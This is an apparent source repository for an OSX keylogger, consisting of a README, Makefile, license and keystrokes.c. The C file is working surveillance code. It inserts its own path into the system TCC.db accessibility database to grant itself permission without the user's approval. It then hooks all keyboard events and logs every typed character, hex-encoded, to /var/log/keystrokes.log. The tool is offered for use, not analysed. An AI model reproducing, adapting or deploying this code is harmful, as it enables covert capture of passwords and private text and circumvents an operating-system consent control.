├── README.md ├── Makefile ├── .gitignore ├── LICENSE └── keystrokes.c /README.md: -------------------------------------------------------------------------------- 1 | # OSX Keylogger 2 | 3 | A Universal Access based keystroke logging utility for OSX. This utility will automatically inject itself into the approved list of assistive devices prior to monitoring keystroke events. 4 | 5 | Logs are stored in "/var/log/keystrokes.log" as hex-encoded unicode strings. 6 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | BIN = keystrokes 2 | 3 | SRCS = $(wildcard *.c) 4 | OBJS = $(SRCS:.c=.o) 5 | CC=clang 6 | LD=clang 7 | 8 | CFLAGS += -pedantic -Weverything 9 | LIBS += -framework ApplicationServices -lsqlite3 10 | 11 | all: $(BIN) 12 | 13 | $(BIN): $(OBJS) 14 | $(LD) $(LDFLAGS) -o $@ $(OBJS) $(LIBS) 15 | 16 | clean: 17 | rm -f $(BIN) $(OBJS) 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Object files 2 | *.o 3 | *.ko 4 | *.obj 5 | *.elf 6 | 7 | # Precompiled Headers 8 | *.gch 9 | *.pch 10 | 11 | # Libraries 12 | *.lib 13 | *.a 14 | *.la 15 | *.lo 16 | 17 | # Shared objects (inc. Windows DLLs) 18 | *.dll 19 | *.so 20 | *.so.* 21 | *.dylib 22 | 23 | # Executables 24 | *.exe 25 | *.out 26 | *.app 27 | *.i*86 28 | *.x86_64 29 | *.hex 30 | 31 | # Debug files 32 | *.dSYM/ 33 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2015 Lunge Technology, LLC 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /keystrokes.c: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2015 Lunge Technology, LLC 3 | 4 | Permission is hereby granted, free of charge, to any person obtaining a 5 | copy of this software and associated documentation files (the "Software"), 6 | to deal in the Software without restriction, including without limitation 7 | the rights to use, copy, modify, merge, publish, distribute, sublicense, 8 | and/or sell copies of the Software, and to permit persons to whom the 9 | Software is furnished to do so, subject to the following conditions: 10 | 11 | The above copyright notice and this permission notice shall be included in 12 | all copies or substantial portions of the Software. 13 | 14 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 15 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 16 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 17 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 18 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING 19 | FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER 20 | DEALINGS IN THE SOFTWARE. 21 | */ 22 | 23 | #include 24 | #include 25 | #include 26 | #include 27 | 28 | #define ACCESSIBILITY_DB "/Library/Application Support/com.apple.TCC/TCC.db" 29 | #define LOGFILE "/var/log/keystrokes.log" 30 | #define MAX_UNICHAR_SIZE 255 31 | 32 | static FILE *log_file; 33 | static int counter; 34 | char *get_bin_path(void); 35 | void add_permissions(char *db_path); 36 | CGEventRef callback(CGEventTapProxy, CGEventType, CGEventRef, void *); 37 | 38 | char *get_bin_path(void) { 39 | int ret; 40 | pid_t pid; 41 | char *buf; 42 | buf = malloc(PROC_PIDPATHINFO_MAXSIZE + 1); 43 | 44 | if (!buf) 45 | return NULL; 46 | 47 | pid = getpid(); 48 | ret = proc_pidpath(pid, buf, PROC_PIDPATHINFO_MAXSIZE); 49 | 50 | if (ret <= 0) { 51 | free(buf); 52 | buf = NULL; 53 | } 54 | 55 | return buf; 56 | } 57 | 58 | void add_permissions(char *db_path) { 59 | char *bin_path; 60 | int rc; 61 | sqlite3 *db; 62 | char *sql; 63 | char *zErrMsg = 0; 64 | bin_path = get_bin_path(); 65 | 66 | if (!bin_path) { 67 | fprintf(stderr, "unable to get bin path\n"); 68 | exit(-1); 69 | } 70 | 71 | rc = sqlite3_open(db_path, &db); 72 | 73 | if (rc) { 74 | fprintf(stderr, "Can't open database: %s\n", sqlite3_errmsg(db)); 75 | exit(-1); 76 | } 77 | 78 | asprintf(&sql, "INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','%s',1,1,1,NULL)", bin_path); 79 | 80 | if (!sql) { 81 | fprintf(stderr, "unable to build sql\n"); 82 | exit(-1); 83 | } 84 | 85 | rc = sqlite3_exec(db, sql, NULL, 0, &zErrMsg); 86 | 87 | if (rc != SQLITE_OK) { 88 | fprintf(stderr, "SQL error: %s\n", zErrMsg); 89 | exit(-1); 90 | } 91 | 92 | rc = sqlite3_close(db); 93 | 94 | if (rc) { 95 | fprintf(stderr, "Can't close database: %s\n", sqlite3_errmsg(db)); 96 | exit(-1); 97 | } 98 | 99 | if (bin_path) free(bin_path); 100 | 101 | if (zErrMsg) sqlite3_free(zErrMsg); 102 | 103 | if (sql) free(sql); 104 | } 105 | 106 | int main(int argc, const char *argv[]) { 107 | CGEventMask mask; 108 | CGEventFlags flags; 109 | CFMachPortRef tap; 110 | CFRunLoopSourceRef loop; 111 | (void)(argc); 112 | (void)(argv); 113 | add_permissions(ACCESSIBILITY_DB); 114 | mask = CGEventMaskBit(kCGEventKeyDown) | CGEventMaskBit(kCGEventKeyDown) | CGEventMaskBit(kCGEventFlagsChanged); 115 | flags = CGEventSourceFlagsState(kCGEventSourceStateCombinedSessionState); 116 | tap = CGEventTapCreate(kCGSessionEventTap, kCGHeadInsertEventTap, 0, mask, callback, &flags); 117 | 118 | if (!tap) { 119 | fprintf(stderr, "unable to create event tap.\n"); 120 | exit(1); 121 | } 122 | 123 | loop = CFMachPortCreateRunLoopSource(kCFAllocatorDefault, tap, 0); 124 | CFRunLoopAddSource(CFRunLoopGetCurrent(), loop, kCFRunLoopCommonModes); 125 | CGEventTapEnable(tap, true); 126 | counter = 0; 127 | log_file = fopen(LOGFILE, "a"); 128 | 129 | if (!log_file) 130 | fprintf(stderr, "unable to open log\n"); 131 | 132 | CFRunLoopRun(); 133 | return 0; 134 | } 135 | 136 | CGEventRef callback(CGEventTapProxy proxy, CGEventType type, CGEventRef event, void *unused) { 137 | UniChar chars[MAX_UNICHAR_SIZE]; 138 | UniCharCount len; 139 | UniCharCount i; 140 | (void)(proxy); 141 | (void)(type); 142 | (void)(unused); 143 | 144 | CGEventKeyboardGetUnicodeString(event, MAX_UNICHAR_SIZE, &len, chars); 145 | 146 | if (len) { 147 | for (i = 0; i < len; i++) 148 | fprintf(log_file, "%02hx", chars[i]); 149 | 150 | fprintf(log_file, " "); 151 | counter++; 152 | 153 | if (counter >= 16) { 154 | fprintf(log_file, "\n"); 155 | counter = 0; 156 | } 157 | 158 | fflush(log_file); 159 | } 160 | 161 | return event; 162 | } 163 | --------------------------------------------------------------------------------